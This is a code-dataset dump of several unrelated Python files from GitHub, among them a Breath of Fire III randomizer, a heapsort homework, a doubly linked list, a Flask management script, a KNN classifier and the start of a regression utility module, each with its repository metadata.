self.old_data[attr])\n\n super().cleanup()\n\n if 'easymodo' in get_activated_codes():\n self.hp = min(self.old_data['hp'], 1)\n\n\ndef write_seed_number():\n seed1 = 'Seed: {0}'.format(get_seed())\n while len(seed1) < addresses.seed1len:\n seed1 += ' '\n 
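# the seed text is written into fixed-width slots in the game files,\n    # so it must be padded to the exact field length\n    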
assert len(seed1) == addresses.seed1len\n seed2 = '{0}'.format(get_seed())\n while len(seed2) < addresses.seed2len:\n seed2 += ' '\n assert len(seed2) == addresses.seed2len\n seed1 = seed1.encode('ascii').replace(b' ', b'\\xff')\n seed1 = seed1.replace(b':', b'\\x8f')\n seed2 = seed2.encode('ascii').replace(b' ', b'\\xff')\n\n a = get_open_file('BIN/ETC/AFLDKWA.EMI', sandbox=True)\n b = get_open_file('BIN/ETC/FIRST.EMI', sandbox=True)\n a.seek(addresses.seed1a)\n a.write(seed1)\n a.seek(addresses.seed2a)\n a.write(seed2)\n b.seek(addresses.seed1b)\n b.write(seed1)\n b.seek(addresses.seed2b)\n b.write(seed2)\n\n\ndef activate_blue_magician_code():\n abilities = set([])\n for m in MonsterObject.every:\n if m.is_canonical:\n abilities |= set(m.abilities)\n\n for l in LevelObject.every:\n if (l.charname not in BaseStatsObject.RESTRICTED_NAMES\n and l.ability > 0):\n a = AbilityObject.get(l.ability)\n abilities -= {a}\n\n for a in sorted(abilities):\n a.set_bit('examinable', True)\n a.reset_skill_type(AbilityObject.EXAMINE_SKILL)\n\n\ndef activate_feyday(filename):\n f = open(filename)\n\n names = sorted({line.strip() for line in f.readlines() if line.strip()})\n if any(len(name) > 5 for name in names):\n print('Warning: Name longer than 5 characters.')\n\n FairyObject.class_reseed('names')\n random.shuffle(names)\n faeries = [fo for fo in FairyObject.every if fo.is_canonical]\n random.shuffle(faeries)\n for name, faerie in zip(names, faeries):\n faerie.set_name(name)\n\n f.close()\n\n\ndef activate_abilonym(filename):\n with open(filename) as f:\n for line in f:\n if '#' in line:\n line, _ = line.split('#', 1)\n line = line.strip()\n if not line:\n continue\n\n if ' ' not in line:\n index, name = line, ''\n else:\n index, name = line.split(' ', 1)\n index, name = index.strip(), name.strip()\n index = int(index, 0x10)\n a = AbilityObject.get(index)\n a._rename = name\n\n\ndef write_spoiler(all_objects):\n SPOILER_FILENAME = 'bof3r_spoiler_{0}.txt'.format(get_seed())\n f = open(SPOILER_FILENAME, 'w+')\n\n f.write('{0} v{1} {2} {3} {4} {5}\\n'.format(\n get_global_label(), VERSION, get_flags(), get_seed(),\n get_random_degree()**0.5, get_difficulty()))\n\n all_objects = sorted(all_objects, key=lambda x: x.__name__)\n random_degrees = [(o.random_degree**0.5) for o in all_objects]\n if len(set(random_degrees)) > 1:\n f.write('R:{0}\\n'.format(' '.join('%s' % rd for rd in random_degrees)))\n random_diffs = [o.random_difficulty for o in all_objects]\n if len(set(random_diffs)) > 1:\n f.write('D:{0}\\n'.format(' '.join('%s' % rd for rd in random_diffs)))\n\n f.write('\\n1. MASTERS\\n'\n '2. CHARACTERS\\n'\n '3. MONSTERS\\n'\n '4. SHOPS\\n'\n '5. MANILLOS\\n'\n '6. CHESTS\\n\\n')\n\n f.write('1. MASTERS\\n\\n')\n for mso in MasterStatsObject.every:\n f.write(str(mso) + '\\n\\n')\n\n f.write('2. CHARACTERS\\n\\n')\n for bso in BaseStatsObject.every:\n f.write(str(bso) + '\\n\\n')\n\n f.write('3. MONSTERS\\n\\n')\n for m in sorted(MonsterObject.every, key=lambda x: x.name):\n if m.is_canonical:\n f.write(str(m) + '\\n\\n')\n\n f.write('4. SHOPS\\n\\n')\n for s in ShopObject.every:\n f.write(str(s) + '\\n\\n')\n\n f.write('5. MANILLOS\\n\\n')\n for mso in ManilloStockObject.every:\n if mso.trades:\n f.write(str(mso) + '\\n\\n')\n\n f.write('6. 
CHESTS\\n\\n')\n areas = {c.area_code for c in ChestObject.every}\n for a in sorted(areas):\n chests = [c for c in ChestObject.every if c.area_code == a]\n if not chests:\n continue\n area_name = chests[0].area_name\n f.write('AREA {0} {1}\\n'.format(a, area_name))\n for c in chests:\n f.write(str(c) + '\\n')\n f.write('\\n')\n\n f.close()\n\n\ndef write_cue_file():\n filename = get_outfile()\n cue_filename = '.'.join(filename.split('.')[:-1] + ['cue'])\n f = open(cue_filename, 'w+')\n f.write('FILE \"{0}\" BINARY\\n\\n'\n 'TRACK 01 MODE2/2352\\n\\n'\n 'INDEX 01 00:00:00\\n'.format(filename))\n f.close()\n\n\ndef rewrite_master_list():\n if MasterStatsObject.flag not in get_flags():\n return\n\n f = get_open_file('BIN/ETC/AFLDKWA.EMI', sandbox=True)\n f.seek(addresses.master_list_afldkwa)\n messages = []\n message = b''\n while len(messages) < 17:\n peek = f.read(1)\n if peek == b'\\x00':\n messages.append(message)\n message = b''\n else:\n message += peek\n\n def format_entry(mso, entry, short=False):\n if entry is None:\n return '{0:3}{1:2}'.format('', '')\n\n sign, attr = entry\n value = abs(getattr(mso, attr))\n if attr == 'dfn':\n attr = 'Def'\n elif attr in ['hp', 'ap']:\n attr = attr.upper()\n else:\n attr = attr[0].upper() + attr[1:]\n\n attr = attr[:2]\n if short:\n if sign == '+':\n return '$BLUE${0:2}{2}'.format(attr, sign, value)\n elif sign == '-':\n return '$RED${0:2}{2}'.format(attr, sign, value)\n else:\n if sign == '+':\n return '$BLUE${0:3}{1}{2}'.format(attr, sign, value)\n elif sign == '-':\n return '$RED${0:3}{1}{2}'.format(attr, sign, value)\n\n new_messages = []\n for mso in MasterStatsObject.every:\n plus = [('+', attr) for (attr, _, _) in mso.specsattrs\n if getattr(mso, attr) > 0]\n minus = [('-', attr) for (attr, _, _) in mso.specsattrs\n if getattr(mso, attr) < 0]\n plus, extra_plus = plus[:4], plus[4:]\n minus, extra_minus = minus[:4], minus[4:]\n plus += [None] * (4-len(plus))\n minus += [None] * (4-len(minus))\n if extra_plus:\n minus[-len(extra_plus):] = extra_plus\n if extra_minus:\n plus[-len(extra_minus):] = extra_minus\n assert len(plus) == len(minus) == 4\n new_message = ''\n short_message = ''\n for left, right in zip(plus, minus):\n if not (left or right):\n continue\n\n leftstr = format_entry(mso, left)\n rightstr = format_entry(mso, right)\n line = '{0} {1}'.format(leftstr, rightstr)\n line = line.rstrip() + '\\n'\n new_message += line\n\n leftstr = format_entry(mso, left, short=True)\n rightstr = format_entry(mso, right, short=True)\n line = '{0} {1}'.format(leftstr, rightstr)\n line = line.rstrip() + '\\n'\n short_message += line\n\n new_message = new_message.rstrip() + '$NOCOLOR$'\n short_message = short_message.rstrip() + '$NOCOLOR$'\n\n old_message = messages[len(new_messages)]\n length = len(NameMixin.convert_from_str(new_message))\n shortlength = len(NameMixin.convert_from_str(short_message))\n if length <= len(old_message):\n new_message += ' ' * (len(old_message)-length)\n new_messages.append(new_message)\n elif shortlength <= len(old_message):\n short_message += ' ' * (len(old_message)-shortlength)\n new_messages.append(short_message)\n else:\n shortest_message = '???$NOCOLOR$'\n shortest_message += ' ' * (len(old_message) - 4)\n new_messages.append(shortest_message)\n assert (len(NameMixin.convert_from_str(new_messages[-1]))\n == len(old_message))\n\n new_messages = [NameMixin.convert_from_str(m) for m in new_messages]\n target_length = sum([len(m) for m in messages])\n current_length = sum([len(m) for m in new_messages])\n assert 
current_length == target_length\n assert len(messages) == len(new_messages)\n\n new_data = b'\\x00'.join(new_messages)\n f.seek(addresses.master_list_afldkwa)\n f.write(new_data)\n f.close()\n f = get_open_file('BIN/ETC/FIRST.EMI', sandbox=True)\n f.seek(addresses.master_list_first)\n f.write(new_data)\n f.close()\n\n\nif __name__ == '__main__':\n try:\n print('You are using the Breath of Fire III randomizer,\\n'\n '\"The Vast and the Violent\", version %s.\\n' % VERSION)\n\n ALL_OBJECTS = [g for g in globals().values()\n if isinstance(g, type) and issubclass(g, TableObject)\n and g not in [TableObject]]\n codes = {\n 'easymodo': ['easymodo'],\n 'equipanything': ['equipanything'],\n 'feyday': ['feyday', 'faeday'],\n 'thinkwell': ['thinkwell'],\n 'bluemagician': ['bluemagician', 'bluemage'],\n 'abilonym': ['abilonym'],\n }\n run_interface(ALL_OBJECTS, snes=False, codes=codes,\n custom_degree=True, custom_difficulty=True)\n\n if 'bluemagician' in get_activated_codes():\n print('SKILL EXAMINE CODE ACTIVATED')\n activate_blue_magician_code()\n\n if 'thinkwell' in get_activated_codes():\n print('FOUNTAIN PEN CODE ACTIVATED')\n\n if 'equipanything' in get_activated_codes():\n print('EQUIP ANYTHING CODE ACTIVATED')\n\n if 'easymodo' in get_activated_codes():\n print('DEBUG MODE ACTIVATED')\n\n if 'feyday' in get_activated_codes():\n feytxt = input('Faerie names text file? ')\n activate_feyday(feytxt)\n\n if 'abilonym' in get_activated_codes():\n abiltxt = input('Ability names text file? ')\n activate_abilonym(abiltxt)\n\n write_seed_number()\n rewrite_master_list()\n clean_and_write(ALL_OBJECTS)\n\n write_spoiler(ALL_OBJECTS)\n write_cue_file()\n\n finish_interface()\n\n except Exception:\n print(format_exc())\n input('Press Enter to close this program. ')\n","repo_name":"abyssonym/vast_violence","sub_path":"randomizer.py","file_name":"randomizer.py","file_ext":"py","file_size_in_byte":74593,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"79"} +{"seq_id":"1321787534","text":"# Bao Tran Do\n# May 10, 2021\n# HW5 \n# This algorithm is for building a max heap since we want the array to have \n# ascending order \n# Source of the algorithm https://en.wikipedia.org/wiki/Heapsort\n\n\n\n# Sort the array of the given size \ndef heapSort(arr):\n\n\tlength = len(arr)\n\tindex0 = 0\n\n\t\n\t# largest value located at the root \n\theapify(arr,length)\n\t\n\tend = length - 1\n\n\twhile end > 0:\n\n\t\t# swap the first element and the last element. 
The old root (the current maximum)\n\t\t# now sits at the end of the array and is no longer part of the heap\n\t\tswap(arr, end, index0) \n\t\t# reduce the heap size by one \n\t\tend = end - 1\n\t\t\n\t\t# restore the heap property to make sure it is still a heap \n\t\tshiftDown(arr, index0 , end)\n\t\t\n\treturn arr \n\n# Want to have the elements in heap order\ndef heapify(arr,count):\n\t# Find the parent of the last element \n\tstart = getParent(count - 1)\n\n\t# Shift the element until all the nodes below the start index are in heap order \n\twhile start >= 0:\n\t\t\n\t\tshiftDown(arr, start, count - 1)\n\n\t\t# get the next parent node\n\t\tstart = start - 1\n\t\n\n# This is to restore the heap \ndef shiftDown(arr, start, end): \n\n\troot = start\n\n\t# keep sifting down while the root still has at least one child \n\twhile getLeftChild(root) <= end:\n\t\tchild = getLeftChild(root)\n\t\tswapChild = root \n\t\n\t\t# if the root value is smaller than the left child, swap \n\t\tif arr[swapChild] < arr[child]:\n\t\t\tswapChild = child\n\t\t\t\n\t\t# if the root value is smaller than the right child, swap \n\t\tif getRightChild(root) <= end and arr[swapChild] < arr[getRightChild(root)]:\n\t\t\tswapChild = getRightChild(root)\n\t\t\t\n\t\t# if the swap child is the same as the root, the heap is restored \n\t\tif swapChild == root:\n\t\t\treturn \n\t\telse: \n\t\t\t# swap the elements \n\t\t\tswap(arr, root, swapChild)\n\t\t\troot = swapChild\n\n\n# This function performs the swapping of the 2 elements \ndef swap(arr, firstPosition, secondPosition):\n\tarr[firstPosition], arr[secondPosition] = arr[secondPosition], arr[firstPosition]\n\treturn arr\n\n# This is getting the index of the parent\n# (integer division, so the result stays a valid list index in Python 3)\ndef getParent(index):\n\treturn (index - 1)//2\n\n# This is getting the left child index \ndef getLeftChild(index):\n\treturn 2 * index + 1 \n\n# This is getting the right child index \ndef getRightChild(index):\n\treturn 2 * index + 2\n\n\n\n# Test cases\ntest1 = []\ntest2 = [0]\ntest3 = [10,1]\ntest4 = [1,10]\ntest5 = [1,2,3,4,5,6]\ntest6 = [1,2,3,4,5,6,7]\ntest7 = [6,5,4,3,2,1]\ntest8 = [7,6,5,4,3,2,1]\ntest9 = [20,11,17,3,6,2]\ntest10 = [20,1,4,21,24]\n\nprint('{:>60}'.format('Test Cases for max heapSort algorithm'))\nprint('--------------------------------------------------------------------------')\nprint('{:>25} {:>40}'.format('cases', 'sorted' + '\\n')) \nprint('{:>25} {:>40}'.format(str(test1), str(heapSort(test1)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test2), str(heapSort(test2)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test3), str(heapSort(test3)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test4), str(heapSort(test4)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test5), str(heapSort(test5)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test6), str(heapSort(test6)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test7), str(heapSort(test7)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test8), str(heapSort(test8)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test9), str(heapSort(test9)) + '\\n')) \nprint('{:>25} {:>40}'.format(str(test10), str(heapSort(test10)) + '\\n')) \n\n
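# Quick illustrative sanity check: heapSort should agree with Python's built-in sorted()\nassert heapSort([9, 4, 7, 1]) == sorted([9, 4, 7, 1])\n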
","repo_name":"trando46/Projects","sub_path":"Python/bdo_hw5.py","file_name":"bdo_hw5.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30031178301","text":"import numpy as np\nfrom bokeh.plotting import *\n\nN = 100\nx = np.linspace(0, 4*np.pi, N)\ny0 = np.sin(x)\ny1 = np.cos(x)\ny2 = np.sin(x) + np.cos(x)\n\ndef main():\n\ts1 = figure(width=250, plot_height=250, title=None)\n\ts1.circle(x, y0, size=10, color=\"navy\", alpha=0.5)\n\n\ts2 = figure(width=250, plot_height=250, title=None)\n\ts2.circle(x, y1, size=10, color=\"firebrick\", alpha=0.5)\n\n\ts3 = figure(width=250, plot_height=250, title=None)\n\ts3.circle(x, y2, size=10, color=\"olive\", alpha=0.5)\n\n\tp = gridplot([[s1, s2, s3]], toolbar_location=None)\n\n\tshow(p)\n\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"nikos-daniilidis/bokeh-starter","sub_path":"getting_started_3.py","file_name":"getting_started_3.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14590182940","text":"# A doubly linked list is a linear data structure in which elements are\n# not stored at contiguous memory locations\n\n# In simple words, it consists of nodes where each node contains a data field\n# and a reference to the next node and to the previous node in the list.\n\n\"\"\"\nA doubly linked list can be visualized as the drawing below\n\nex)\n\n-pointer \"next\" is denoted as \"->\"\n-pointer \"prev\" is denoted as \"<-\"\n-NULL is the same as None\n\nHEAD -> |---DATA---| -> |---DATA---| -> |---DATA---| -> NULL\n        |----------|    |----------|    |----------|\n     <- |----------| <- |----------| <- |----------|\n\n        Head <- |prev  Tail  next| -> LastNode\n\n\"\"\"\nclass Node:\n\n    def __init__(self,data = None):\n        self.data = data\n        self.next = None\n        self.prev = None\n\n\nclass Linkedlist():\n\n    def __init__(self):\n        self.head = Node()\n        self.tail = Node()\n        self.size = 0\n\n    # display elements in the linked list from the first element\n    def displayFromFirstElement(self):\n\n        currNode = self.head.next  # skip the sentinel head node\n\n        while currNode:\n            print(currNode.data)\n            currNode = currNode.next\n\n    # display elements in the linked list from the last element\n    def displayFromLastElement(self):\n\n        lastNode = self.tail.next\n\n        # stop before printing the sentinel head node\n        while lastNode is not None and lastNode is not self.head:\n            print(lastNode.data)\n            lastNode = lastNode.prev\n\n    # add a new node right after the head\n    def appendToFirst(self,data):\n\n        if self.size == 0:\n            newNode = Node(data)\n            self.head.next = newNode\n            self.tail.next = newNode\n            self.tail.prev = self.head\n\n            self.size += 1\n\n        else:\n            firstNode = self.head.next\n            newNode = Node(data)\n            self.head.next = newNode\n            newNode.next = firstNode\n            firstNode.prev = newNode\n            newNode.prev = self.head\n            self.tail.prev = self.head\n            self.size += 1\n\n        return 0\n\n    # remove the first node whose data matches the given data,\n    # re-pointing prevNode and nextNode around it\n    def remove(self,data):\n\n        node = self.head\n\n        if self.size > 0:\n\n            while node is not None:\n\n                if node.data == data:\n\n                    if node == self.tail.next:\n                        node = node.prev\n                        node.next = None\n                        self.tail.next = node\n                        self.tail.prev = self.head\n                        self.size -= 1\n                        break\n\n                    if node == self.head.next:\n                        node = node.next\n                        self.head.next = node\n                        node.prev = self.head\n                        self.size -= 1\n                        break\n\n                    else:\n                        # relink the neighbours; the loop step below then\n                        # advances to nextNode without skipping it\n                        prevNode = node.prev\n                        nextNode = node.next\n                        nextNode.prev = prevNode\n                        prevNode.next = nextNode\n                        self.size -= 1\n\n                node = node.next\n\n        else:\n            return -1\n\n        return 0\n\n    def appendToEnd(self,data):\n\n        if self.size == 0:\n            node = Node(data)\n\n            self.head.next = node\n            node.prev = self.head\n            self.tail.next = node\n            self.tail.prev = self.head\n\n            self.size += 1\n\n        else:\n            lastNode = self.tail.next\n            node = Node(data)\n            lastNode.next = node\n            node.prev = lastNode\n            self.tail.next = node\n            self.tail.prev = self.head\n\n            self.size += 1\n\n        return 0\n\n    # return the number of stored elements\n    def length(self):\n        return self.size\n
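\n# Illustrative example usage: build a list, remove a value, then print front to back\nif __name__ == '__main__':\n    ll = Linkedlist()\n    for v in [1, 2, 3]:\n        ll.appendToEnd(v)\n    ll.remove(2)\n    ll.displayFromFirstElement()  # expected output: 1 then 3\n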
","repo_name":"deanyim0226/data_structure","sub_path":"doublyLinkedlist.py","file_name":"doublyLinkedlist.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6073666985","text":"# manage.py\n\n\nimport getpass\nimport os\nimport unittest\nimport coverage\n\nfrom flask_script import Manager\nfrom flask_migrate import Migrate, MigrateCommand\n\nfrom api import models\nfrom api.models import User\nfrom api.auth import views\n\nCOV = coverage.coverage(\n    branch=True,\n    include='project/*',\n    omit=[\n        'project/tests/*',\n        'project/server/config.py',\n        'project/server/*/__init__.py'\n    ]\n)\nCOV.start()\n\nfrom api import app, db, models\n\nmigrate = Migrate(app, db)\nmanager = Manager(app)\n\n# migrations\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef test():\n    \"\"\"Runs the unit tests without test coverage.\"\"\"\n    tests = unittest.TestLoader().discover('tests', pattern='test*.py')\n    result = unittest.TextTestRunner(verbosity=2).run(tests)\n    if result.wasSuccessful():\n        return 0\n    return 1\n\n\n@manager.command\ndef cov():\n    \"\"\"Runs the unit tests with coverage.\"\"\"\n    tests = unittest.TestLoader().discover('project/tests')\n    result = unittest.TextTestRunner(verbosity=2).run(tests)\n    if result.wasSuccessful():\n        COV.stop()\n        COV.save()\n        print('Coverage Summary:')\n        COV.report()\n        basedir = os.path.abspath(os.path.dirname(__file__))\n        covdir = os.path.join(basedir, 'tmp/coverage')\n        COV.html_report(directory=covdir)\n        print('HTML version: file://%s/index.html' % covdir)\n        COV.erase()\n        return 0\n    return 1\n\n\n@manager.command\ndef create_db():\n    \"\"\"Creates the db tables.\"\"\"\n    db.create_all()\n\n\n@manager.command\ndef drop_db():\n    \"\"\"Drops the db tables.\"\"\"\n    db.reflect()\n    db.drop_all()\n\n\n@manager.command\ndef register_first():\n    \"\"\"Register new user\"\"\"\n    email = input(\"Please enter email: \")\n    password = getpass.getpass(\"Enter Password:\")\n    user = User.query.filter_by(email=email).first()\n    if not user:\n        try:\n            user = User(\n                email=email,\n                password=password\n            )\n            db.session.add(user)\n            db.session.commit()\n        except Exception as e:\n            responseObject = {\n                'status': 'fail',\n                'message': 'Some error occurred. 
Please try again.'\n }\n\n\nif __name__ == '__main__':\n manager.run()\n","repo_name":"lampwins/orangengine-ui","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"29610241723","text":"#####\n# Author: Manuel Galli\n# e-mail: gmanuel89@gmail.com / manuel.galli@revvity.com\n# Updated date: 2023-07-20\n#####\n\n## Import libraries\nimport sys, subprocess, traceback\n\n\n## Install required packages\ndef install_required_packages_from_file(requirements_file_path = './requirements.txt') -> bool:\n # Initialise output\n required_packages_installed = False\n try:\n # Install\n python = sys.executable\n subprocess.check_call([python, '-m', 'pip', 'install', '-r', requirements_file_path], stdout=subprocess.DEVNULL)\n required_packages_installed = True\n except:\n traceback.print_exc()\n # return\n return required_packages_installed","repo_name":"gmanuel89/Python-packages","sub_path":"common/install_required_packages_from_file.py","file_name":"install_required_packages_from_file.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"5285814571","text":"import numpy as np\n\n\nclass KNearestNeighbor:\n def __init__(self):\n pass\n\n def fit(self, X, y):\n self.X_train = X\n self.y_train = y\n\n def compute_distances_two_loops(self, X):\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n for i in range(num_test):\n for j in range(num_train):\n dists[i][j] = np.sqrt((X[i] - self.X_train[j]) @ (X[i] - self.X_train[j]).T)\n return dists\n\n def compute_distances_one_loop(self, X):\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n for i in range(num_test):\n row_dists = X[i, :] - self.X_train\n dists[i, :] = np.sqrt(np.sum(row_dists * row_dists, axis=1))\n return dists\n\n def compute_distances_no_loops(self, X):\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n sub = np.expand_dims(X, axis=1) - np.expand_dims(self.X_train, axis=0)\n dists = np.sqrt(np.sum(sub * sub, axis=2))\n return dists\n\n def predict(self, X, k=5, num_loops=0):\n if num_loops == 2:\n dists = self.compute_distances_two_loops(X)\n elif num_loops == 1:\n dists = self.compute_distances_one_loop(X)\n elif num_loops == 0:\n dists = self.compute_distances_no_loops(X)\n else:\n raise ValueError(f'Invalid value {num_loops} for num_loops')\n return self.predict_labels(dists, k)\n\n def predict_labels(self, dists, k=1):\n num_test = dists.shape[0]\n y_pred = np.zeros(num_test)\n for i in range(num_test):\n top_k_args = np.argsort(dists[i])[:k]\n closest_y = self.y_train[top_k_args]\n y_pred[i] = np.bincount(closest_y).argmax()\n return y_pred\n","repo_name":"NikOrlov/ml_made","sub_path":"HW01/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14674584308","text":"from django.urls import path, include\n\nimport customers.views\n\napp_name = 'customers'\n\ndebit_urlpatterns = [\n path('', customers.views.DebitView.as_view(), name='debit'),\n path('edit', customers.views.DebitEditView.as_view(), name='debit-edit'),\n path('delete', customers.views.DebitDeleteView.as_view(), 
name='debit-delete')\n]\n\ncustomer_urlpatterns = [\n path('', customers.views.CustomerDetailView.as_view(), name='customer'),\n path('edit', customers.views.CustomerEditView.as_view(), name='customer-edit'),\n path('debit', customers.views.DebitAddView.as_view(), name='customer-debit'),\n path('debit/-/', include(debit_urlpatterns)),\n]\nurlpatterns = [\n path('', customers.views.CustomersListView.as_view(), name='index'),\n path('create', customers.views.CustomerCreateView.as_view(), name='create'),\n path('/', include(customer_urlpatterns))\n]\n","repo_name":"comargo/milkshop","sub_path":"customers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"40299895604","text":"menuList = []\n\ndef BillMenu():\n total = 0\n print(\"Your order\".center(16, \"-\"))\n for i in range(len(menuList)):\n print(menuList[i][0], \"price\", menuList[i][1], \"baht\")\n total += menuList[i][1]\n print(\"Total price\", total, \"baht\")\n\nwhile True:\n menuName = input(\"Please Enter Menu : \")\n if menuName.lower() == \"exit\":\n break\n else:\n menuPrice = int(input(\"Please Enter Price : \"))\n menuList.append([menuName, menuPrice])\nprint(menuList)\nBillMenu()\n\n","repo_name":"LaWRInG/CP3-Naruebase-Polagoth","sub_path":"Lecture72.py","file_name":"Lecture72.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"39730718340","text":"import numpy as np\nimport pandas as pd\nimport sys\nimport random\nimport time\nimport uuid\nimport string\n\nsystem_size = 2500000000\n\ndef sys_main(row_size):\n\n random.seed(time.time())\n\n row_num = int(system_size / row_size)\n col_name = ['y_id']\n field_size = int(row_size / 10)\n\n # create 10 cols\n for i in range(0, 10):\n field_name = 'field' + str(i)\n col_name.append(field_name)\n\n payloads = []\n payloads_size = 100\n for i in range(0, payloads_size):\n payload = ''.join([random.choice(string.ascii_letters + string.digits) for nn in range(field_size)])\n payloads.append(payload)\n\n # create dataframe\n df = pd.DataFrame(columns=col_name)\n for i in range(0, row_num):\n if i % 1000 == 0:\n print(i, row_num, int(i/row_num*100), '%')\n new_col = [uuid.uuid1()]\n for j in range(1, 11):\n payload = random.sample(payloads, 1)[0]\n new_col.append(payload)\n df_t = pd.DataFrame([new_col], columns=col_name)\n df = pd.concat([df, df_t], ignore_index=True)\n\n df.to_csv('cassdataset.csv', sep=',', index=0)\n ids = df['y_id']\n ids.to_csv('y_id.csv', sep=',', index=0, header=True)\n return 0\n\n\nif __name__ == '__main__':\n print('workload generator starts.')\n row_size = int(sys.argv[1])\n sys_main(row_size=row_size)\n print('workload is finished!')\n","repo_name":"daniarherikurniawan/Cassandra-QoE","sub_path":"CassandraCodes/workload_generator.py","file_name":"workload_generator.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"12796146547","text":"from keras.wrappers.scikit_learn import KerasRegressor\nimport numpy as np\nfrom sklearn.model_selection import train_test_split, TimeSeriesSplit\nfrom sklearn.feature_selection import SelectFromModel, RFECV\nfrom autolrn.encoding import labelenc as lc\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.metrics 
import mean_squared_error, explained_variance_score\nfrom sklearn.metrics import r2_score, mean_squared_log_error, make_scorer\nfrom time import time\nfrom . import param_grids_distros as pgd\nfrom . import neuralnets as nn\nfrom .. import auto_utils as au\nfrom autolrn.classification import eval_utils as eu\nfrom random import randint\nfrom scipy.stats import randint as sp_randint\nfrom sklearn.svm import LinearSVR\nfrom sklearn.ensemble import BaggingRegressor\nfrom pandas import DataFrame\nfrom sklearn.base import is_regressor\nfrom sklearn.pipeline import Pipeline\n\nEPSILON = np.finfo(float).eps\n\n\ndef custom_rms_log_err(y_true, y_pred):\n \"\"\"\n Root mean squared log error\n\n ---\n\n y_true: target data\n y_pred: predicted data\n \"\"\"\n assert len(y_true) == len(y_pred)\n if (y_true < 0).any() or (y_pred < 0).any():\n raise ValueError(\n \"Root Mean Squared Logarithmic Error cannot be used when \"\n \"targets contain negative values.\")\n # msle = mean_squared_error(np.log1p(y_true), np.log1p(y_pred))\n msle = mean_squared_log_error(y_true, y_pred)\n return np.sqrt(msle)\n\n\n# carefully prepare your target before using this...\ndef custom_rms_perc_err(y_true, y_pred):\n \"\"\"\n Root mean squared percentage error\n\n ---\n\n y_true: target data\n y_pred: predicted data\n \"\"\"\n assert len(y_true) == len(y_pred)\n if (y_true == 0).any():\n raise ZeroDivisionError(\n \"Root Mean Squared Percentage Error \"\n \"cannot be used when targets contain zeros\")\n\n # mspe = np.mean(np.square((y_true - y_pred)/np.clip(y_true, EPSILON, 1.)))\n mspe = np.mean(np.square((y_true - y_pred)/y_true))\n return np.sqrt(mspe)\n\n\ndef get_custom_scorer(scoring=None, y_train=None):\n # check scoring and y_train exist\n scorer=None\n if scoring == \"neg_rmsle\":\n if (y_train < 0).any():\n raise ValueError(\n \"Root Mean Squared Logarithmic Error cannot be used when \"\n \"targets contain negative values.\")\n else:\n scorer = make_scorer(\n custom_rms_log_err, greater_is_better=False\n )\n elif scoring == \"neg_rms_perc_err\":\n if (y_train == 0).any():\n raise ZeroDivisionError(\n \"Root Mean Squared Percentage Error cannot be used when \"\n \"targets contain zeros.\")\n else:\n scorer = make_scorer(\n custom_rms_perc_err, greater_is_better=False\n )\n else:\n scorer = scoring\n\n return scorer\n\n\ndef split_and_encode_Xy(\n X, y, encoding='le', feat_scaler=True, tgt_scaler=True, \n freqs=None, dummy_cols=10, ohe_dates=False,\n test_size=.25, feat_select=True, shuffle=True, enc_Xy=False, \n X_test=None, scoring='r2'):\n \"\"\"\n Splits X, y into train and test subsets and encodes them\n\n ---\n\n shuffle: set it to False to preserve item order\n \"\"\"\n X_train, y_train, y_test = (None, None, None)\n # do not shuffle the data before splitting to respect row order\n if not enc_Xy:\n # check X, y are valid dataframes or numpy arrays...\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=test_size, shuffle=shuffle)\n else:\n print()\n print(\"Encoding full data set 'X' -> 'X_train'\")\n X_train = X\n y_train = y\n\n print(\"Let's have a look at the first row and output\")\n print(\"X_train\\n\", X_train.head())\n print(\"y_train\\n\", y_train.head())\n print()\n\n if list(X.select_dtypes(include=[\"datetime\"]).columns):\n print(\"datetime type found.\")\n X_train = lc.get_date_features(X_train, freqs)\n if X_test is not None:\n X_test = lc.get_date_features(X_test, freqs)\n\n # print(X_train[\"Month\"].head(3))\n\n if encoding == 'le':\n X_train = lc.dummy_encode(X_train.copy()).astype(np.float32)\n if X_test is not 
